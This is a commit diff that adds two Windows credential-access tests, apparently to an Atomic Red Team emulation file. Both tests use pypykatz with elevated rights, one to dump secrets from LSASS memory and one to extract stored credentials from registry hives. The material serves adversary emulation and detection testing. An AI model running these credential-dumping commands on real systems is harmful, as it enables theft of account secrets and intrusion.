pypykatz registry and LSASS tests (#784)

* pypykatz registry and LSASS tests * typo fix
2020-01-18 12:40:45 -06:00
parent 3643481bf1
commit ef772a3af9
1 changed files with 29 additions and 1 deletions
@@ -295,4 +295,32 @@ atomic_tests:
    cleanup_command: |
      rm "#{output_folder}\sam"
      rm "#{output_folder}\system"
-      rm "#{output_folder}\security"
+      rm "#{output_folder}\security"
+
+- name: LSASS read with pypykatz
+  description: |
+    Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live lsa
+
+- name: Registry parse with pypykatz
+  description: |
+    Parses registry hives to obtain stored credentials
+    #https://github.com/skelsec/pypykatz and it's dependencies must be installed
+  supported_platforms:
+    - windows
+  executor:
+    name: command_prompt
+    elevation_required: true
+    prereq_command: |
+      py -3
+    command: |
+      pypykatz live registry